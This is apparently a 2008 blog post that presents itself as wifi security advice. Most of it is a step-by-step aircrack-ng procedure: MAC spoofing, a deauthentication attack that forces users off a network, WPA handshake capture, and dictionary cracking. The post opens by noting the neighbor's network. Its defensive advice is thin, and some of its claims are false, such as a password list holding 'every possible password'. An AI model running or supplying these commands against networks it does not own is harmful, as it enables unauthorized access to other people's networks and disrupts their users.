I noticed my neighbors wifi was protected with WPA-TKIP. Your wifi might use WPA. If you protect it (you should to guard against man in the middle attacks), you should not use WEP, because that protocol is broken. It doesn't matter how long or complex your password is, people can still get in. WPA is better, but because it involves users picking a password, there is a risk. To make sure your WPA is secure, fire up Backtrack 3 and type exactly the following, and after each line hit enter. Do not type the lines that are in parentheses.
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel) -w wpa --bssid (bssid) wlan0
(new shell)
aireplay-ng -0 5 -a (bssid) wlan0
(wait for the handshake)
(test)
aircrack-ng wpa-01.cap
(test again)
aircrack-ng wpa-01.cap -w /pentest/wireless/aircrack-ng/test/password.lst
So what this does is take down your wireless card, change the MAC address, find the BSSID and channel of your network with WPA on it, then performs a deauth attack to force everyone off the network. When they reconnect, it listens for the handshake between the client and the AP. Once it has the hash, it uses a password list to brute force the hash and try to get the password. The bigger the password list, the higher chance you will get it.
The moral of the story is that if you want a secure network, chose a good password. Most people who will try to get at your network will use this attack method. If your password is not in the list, then they will never find it. There is a 28gig password list out there that contains every possible password for WPA (compressed its 70 megs). However, it is VERY doubtful that an attacker will use this because of the size and the amount of time it will take to try all of those. If for some reason you think a government is after your data, then they probably would use that list. In that case, use a VPN to connect to another network, and it doesn't matter if they see that traffic because it is all encrypted.
Wednesday, December 24, 2008
Subscribe to:
Post Comments (Atom)
Posts
No comments:
Post a Comment